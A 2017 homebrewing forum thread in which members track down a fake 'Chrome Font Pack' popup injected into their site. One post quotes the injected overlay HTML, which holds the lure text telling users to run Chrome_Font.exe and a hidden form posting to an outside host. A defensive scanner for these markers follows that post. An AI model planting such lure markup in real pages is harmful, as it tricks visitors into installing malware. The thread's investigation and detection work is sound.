Attack / Virus

RubberToe
Award Winner 13
Posts: 3743
Joined: Mon Mar 14, 2011 9:47 am
Name: Rob
Location: Dartmouth

Post by RubberToe » Tue Mar 14, 2017 10:23 am

Hey everyone,

A user has reported something suspicious, and it's an attack directed at Google Chrome users from what I can tell.

If you see any page asking you to install a missing font, DO NOT DO IT.

If anyone sees this popup / error / page, please let me know as I haven't tracked down how the attacker is doing this.

If it's one post or topic, please let me know which. Perhaps it's just something embedded in a post text.

Thanks,
-Rob
Electric Brewery Build
On tap at RubberToe's:
Sometimes on a Sunday Belgian Dubbel, Oaked Old Ale, Ordinary Bitter

GAM
Verified User
Posts: 5402
Joined: Wed May 18, 2011 2:50 pm
Name: Sandy MacNeil
Location: North End HFX

Re: Attack / Virus

Post by GAM » Tue Mar 14, 2017 10:27 am

Lots of it going around.

Thanks Rob.

S

jacinthebox
Award Winner 16
Posts: 3047
Joined: Tue Oct 16, 2012 12:44 pm
Name: Justin
Location: Hubley

Re: Attack / Virus

Post by jacinthebox » Tue Mar 14, 2017 10:37 am

Yeah, it's a fake font install... only an issue for Chrome users.
Brathair Brewing



Brew Hard...Stay Humble

RubberToe
Award Winner 13
Posts: 3743
Joined: Mon Mar 14, 2011 9:47 am
Name: Rob
Location: Dartmouth

Re: Attack / Virus

Post by RubberToe » Tue Mar 14, 2017 10:45 am

I can't reproduce it with Chrome on Linux. Can someone on Windows try? You may need to come from Google search, so searching for "site:brewnosers.org brewing" might lead you to it.

Maybe it's just some specific topics with some embedded image / javascript somehow. I need to find it to kill it.
Electric Brewery Build
On tap at RubberToe's:
Sometimes on a Sunday Belgian Dubbel, Oaked Old Ale, Ordinary Bitter

jacinthebox
Award Winner 16
Posts: 3047
Joined: Tue Oct 16, 2012 12:44 pm
Name: Justin
Location: Hubley

Re: Attack / Virus

Post by jacinthebox » Tue Mar 14, 2017 11:15 am

I had it on my home PC.

I resolved it by going to settings/advanced settings/reset settings.

It went away.

https://malwaretips.com/blogs/remove-ch ... exe-virus/

Bottom of the page... malware software didn't pick up on anything... maybe because I didn't click install on the virus popup.
Brathair Brewing



Brew Hard...Stay Humble

LeafMan66_67
Award Winner 2
Posts: 4596
Joined: Fri Mar 02, 2012 7:10 am
Name: Derek Stapleton
Location: Lower Sackville, NS

Re: Attack / Virus

Post by LeafMan66_67 » Tue Mar 14, 2017 12:34 pm

Definitely there if you link to the site via a Windows Google Search "site:brewnosers.org brewing". First two forum links give you the attached screen:
"He was a wise man who invented beer." - Plato

RubberToe
Award Winner 13
Posts: 3743
Joined: Mon Mar 14, 2011 9:47 am
Name: Rob
Location: Dartmouth

Re: Attack / Virus

Post by RubberToe » Tue Mar 14, 2017 12:47 pm

While on that page, can you view source and see Hoefler anywhere in the text? I can't. But perhaps it's only in the initial load from Google.
Electric Brewery Build
On tap at RubberToe's:
Sometimes on a Sunday Belgian Dubbel, Oaked Old Ale, Ordinary Bitter

LeafMan66_67
Award Winner 2
Posts: 4596
Joined: Fri Mar 02, 2012 7:10 am
Name: Derek Stapleton
Location: Lower Sackville, NS

Re: Attack / Virus

Post by LeafMan66_67 » Tue Mar 14, 2017 1:15 pm

RubberToe wrote: While on that page, can you view source and see Hoefler anywhere in the text? I can't. But perhaps it's only in the initial load from Google.

Can no longer get it to pop up.
"He was a wise man who invented beer." - Plato

RubberToe
Award Winner 13
Posts: 3743
Joined: Mon Mar 14, 2011 9:47 am
Name: Rob
Location: Dartmouth

Re: Attack / Virus

Post by RubberToe » Tue Mar 14, 2017 1:23 pm

Odd. If you can get it to happen again please update.
Electric Brewery Build
On tap at RubberToe's:
Sometimes on a Sunday Belgian Dubbel, Oaked Old Ale, Ordinary Bitter

RubberToe
Award Winner 13
Posts: 3743
Joined: Mon Mar 14, 2011 9:47 am
Name: Rob
Location: Dartmouth

Re: Attack / Virus

Post by RubberToe » Tue Mar 14, 2017 1:55 pm

WordPress was highly suspect so I removed it. It's still puzzling but it was at the top level of the site. Looking through its files there was something fishy as well. WordPress has been a common attack vector for a long time, and we don't maintain ours. Therefore I figure it's a liability so I removed it.

If anyone wants to replace the main web page I'm open to suggestions.

If anyone can reproduce this Chrome font thing I would like to know.

Thanks,
-Rob
Electric Brewery Build
On tap at RubberToe's:
Sometimes on a Sunday Belgian Dubbel, Oaked Old Ale, Ordinary Bitter

MarkPower
Award Winner 1
Posts: 43
Joined: Fri Jan 13, 2012 4:15 pm
Name: Mark Power
Location: Elmsdale, NS

Re: Attack / Virus

Post by MarkPower » Tue Mar 14, 2017 3:10 pm

Hey Rob,

I can reproduce by doing a Google search for "site:brewnosers.org brewing". Any forum link I click will cause the font thing to open. If I view source it does have Hoefler in the text.

Code:

<div id="dm-overlay"><div id="dm-table"><div id="dm-cell"><div id="dm-modal"><div id="dm-table"><a href="javascript:void(0)" onclick="document.getElementById('dm-overlay').style.display = 'none'; setTimeout(dy0,1000);" id="cl0se"></a><img id="l0gos" alt='' /><p id="pphh" >The "HoeflerText" font wasn't found.</p></div><div id="odiv9"><p id="info1" >The web page you are trying to load is displayed incorrectly, as it uses the "HoeflerText" font. To fix the error and display the text, you have to update the "Chrome Font Pack".</p><p id="info2" style="display:none;">Step 1: In the bottom left corner of the screen you'll see the download bar. <b id="bbb1">Click on the Chrome_Font.exe</b> item.<br id="brbr1" />Step 2: Press <b id="bbb1">Yes(Run)</b> in order to see the correct content on the web page.</p><div id="divtabl"><table id="tabl1"><tbody id="tbody1"><tr id="trtr1"><td id="tdtd1">Manufacturer:</td><td id="tdtd1">Google Inc. All Rights Reserved</td></tr><tr id="trtr1"><td id="tdtd1">Current version:</td><td id="tdtd1">Chrome Font Pack <b id="bbb2">53.0.2785.89</b></td></tr><tr id="trtr1"><td id="tdtd1">Latest version:</td><td id="tdtd1">Chrome Font Pack <b id="bbb2">57.2.5284.21</b></td></tr></tbody></table><div id="helpimg"><img id="inf0s" alt='' /></div></div><form action="http://www.ibdaa.edu.sa/main.php" method="post" id="form_1d"><input type='hidden' name='infol' value='1ruQABqyXM4ZJccx2UKWo1SbGco0MV3G1PY+pCWlGtqGo1CKYt0=' /></form><div id="upe0" onclick="ue0()" ><a href="javascript:void(0)" id="b00tn">Update</a></div></div></div></div></div><div id="popup-container" class="popup-window gc" style="display:none;"><div class="bigarrow element-animation"></div></div></div>
<script>
I'm using Windows 10 and Chrome version 56.0.2924.87
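
A defender-side check built on the markup quoted in the post above, as an added example that is not part of the original thread: it scans one saved page source for the overlay's element ids, its lure phrases, and any form that posts to a host other than the site's own. The names `scan_page` and `OverlayScanner`, both sample pages and the host `collector.example` are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Strings and ids taken from the overlay markup quoted in the post above.
LURE_PHRASES = ("HoeflerText", "Chrome Font Pack", "Chrome_Font.exe")
LURE_IDS = {"dm-overlay", "dm-modal"}


class OverlayScanner(HTMLParser):
    """Collects fake-font-lure indicators from one saved page source."""

    def __init__(self, site_host):
        super().__init__(convert_charrefs=True)
        self.site_host = site_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if a.get("id") in LURE_IDS:
            self.findings.append(("lure-id", a["id"]))
        if tag == "form":
            host = (urlparse(a.get("action") or "").hostname or "").lower()
            # A relative action has no hostname, so it stays on the site.
            own = host == self.site_host or host.endswith("." + self.site_host)
            if host and not own:
                self.findings.append(("offsite-form", host))

    def handle_data(self, data):
        for phrase in LURE_PHRASES:
            if phrase in data:
                self.findings.append(("lure-text", phrase))


def scan_page(html, site_host):
    """Return a sorted, de-duplicated list of (kind, value) findings."""
    scanner = OverlayScanner(site_host)
    scanner.feed(html)
    scanner.close()
    return sorted(set(scanner.findings))


# Constructed samples: a trimmed overlay with a placeholder form host, and a clean page.
INFECTED = ('<div id="dm-overlay"><p>The "HoeflerText" font wasn\'t found.</p>'
            '<form action="http://collector.example/main.php" method="post">'
            '<input type="hidden" name="infol" value="PLACEHOLDER"/></form></div>')
CLEAN = '<form action="./ucp.php?mode=login" method="post"><p>Brewing</p></form>'

if __name__ == "__main__":
    for name, page in (("infected", INFECTED), ("clean", CLEAN)):
        print(name, scan_page(page, "brewnosers.org"))
```

Since the thread reports that the overlay is only present in some page loads, the scan is only meaningful on source saved while the popup is showing.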

MarkPower
Award Winner 1
Posts: 43
Joined: Fri Jan 13, 2012 4:15 pm
Name: Mark Power
Location: Elmsdale, NS

Re: Attack / Virus

Post by MarkPower » Tue Mar 14, 2017 3:14 pm

Update: I was able to reproduce this several times in a row before replying, but while checking what version of Chrome I had, it initiated an update. Now it is on Version 57.0.2987.98 and I am no longer able to reproduce it, and the source no longer has the above snippet I posted.

RubberToe
Award Winner 13
Posts: 3743
Joined: Mon Mar 14, 2011 9:47 am
Name: Rob
Location: Dartmouth

Re: Attack / Virus

Post by RubberToe » Tue Mar 14, 2017 3:20 pm

Thanks for the info, Mark!
Electric Brewery Build
On tap at RubberToe's:
Sometimes on a Sunday Belgian Dubbel, Oaked Old Ale, Ordinary Bitter

jimboh
Verified User
Posts: 326
Joined: Tue Dec 13, 2016 1:46 pm
Name: jim
Location: Jeddore NS

Re: Attack / Virus

Post by jimboh » Thu Mar 16, 2017 4:37 pm

I used Chrome to access the site for the first time today, had been using Firefox. Got the virus warning. Tried to view source but the popup no longer appears.
Drinking: Best Coast IPA, Old Speckled Hen Clone, Northern Lights (NG),
Belgian Saison, Blonde Ale, Toy Soldier Stout(OBK) and 14G batch of ESB.
Fermenting: Taking a rest!
Scheduled: Another 10G of Toy Soldier Stout.

jimboh
Verified User
Posts: 326
Joined: Tue Dec 13, 2016 1:46 pm
Name: jim
Location: Jeddore NS

Re: Attack / Virus

Post by jimboh » Thu Mar 16, 2017 11:48 pm

Hi, I am using a different computer and visited the site using Chrome and got the virus. I saved the source for the whole page if it's any use to you. Let me know if you want me to upload the txt file as an attachment or email it.
I got there by typing brewnosers in search and it was the first.
The Google link is https://www.google.ca/url?sa=t&rct=j&q= ... OVt7nYTYfw

I believe it's cached so it may be a problem you no longer have. Don't know if you can request Google to refetch the page due to this issue.
Drinking: Best Coast IPA, Old Speckled Hen Clone, Northern Lights (NG),
Belgian Saison, Blonde Ale, Toy Soldier Stout(OBK) and 14G batch of ESB.
Fermenting: Taking a rest!
Scheduled: Another 10G of Toy Soldier Stout.

RubberToe
Award Winner 13
Posts: 3743
Joined: Mon Mar 14, 2011 9:47 am
Name: Rob
Location: Dartmouth

Re: Attack / Virus

Post by RubberToe » Sat Mar 18, 2017 1:21 pm

Thanks.
Electric Brewery Build
On tap at RubberToe's:
Sometimes on a Sunday Belgian Dubbel, Oaked Old Ale, Ordinary Bitter

danlatimer
Verified User
Posts: 275
Joined: Sun Apr 26, 2015 9:45 pm
Name: Daniel N Latimer

Re: Attack / Virus

Post by danlatimer » Thu Mar 23, 2017 4:34 pm

It just happened to me again.

This is the culprit: https://malwaretips.com/blogs/remove-ch ... exe-virus/

Here's a forum post about server admins talking about trying to get rid of it. They apparently eventually did but they didn't post how they did it :S http://forum.odroid.com/viewtopic.php?t=25568

After 5 minutes or so it stopped happening again. Probably a strategy to prevent it from being fixed.

Here are a few pictures of it happening

[Two images, not preserved]

RubberToe
Award Winner 13
Posts: 3743
Joined: Mon Mar 14, 2011 9:47 am
Name: Rob
Location: Dartmouth

Re: Attack / Virus

Post by RubberToe » Thu Mar 23, 2017 6:39 pm

Thanks, I'm digging again.
Electric Brewery Build
On tap at RubberToe's:
Sometimes on a Sunday Belgian Dubbel, Oaked Old Ale, Ordinary Bitter

RubberToe
Award Winner 13
Posts: 3743
Joined: Mon Mar 14, 2011 9:47 am
Name: Rob
Location: Dartmouth

Re: Attack / Virus

Post by RubberToe » Thu Mar 23, 2017 6:43 pm

Screw this, I'm installing a fresh copy of phpBB. Here goes... don't worry, I have lots of backups. :)
Electric Brewery Build
On tap at RubberToe's:
Sometimes on a Sunday Belgian Dubbel, Oaked Old Ale, Ordinary Bitter

RubberToe
Award Winner 13
Posts: 3743
Joined: Mon Mar 14, 2011 9:47 am
Name: Rob
Location: Dartmouth

Re: Attack / Virus

Post by RubberToe » Thu Mar 23, 2017 7:45 pm

The site has been upgraded. Now I have to fix the style. And new Tapatalk!
Electric Brewery Build
On tap at RubberToe's:
Sometimes on a Sunday Belgian Dubbel, Oaked Old Ale, Ordinary Bitter
